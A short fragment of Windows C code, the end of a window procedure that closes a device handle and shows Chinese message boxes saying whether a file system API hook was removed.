                                      NULL, 0, NULL, 0, &cb, 0);
            if (bResult) {
                MessageBox(hWnd, _T("文件系统API 钩子移去成功!"), szAppTitle,
                           MB_ICONINFORMATION|MB_OK);
            } else {
                MessageBox(hWnd, _T("不能移去文件系统API 钩子!"), szAppTitle,
                           MB_ICONINFORMATION|MB_OK);
            }
            CloseHandle(hDevice);
        }
        PostQuitMessage(0);
        return 0;
    }

    return DefWindowProc(hWnd, Message, wParam, lParam);
}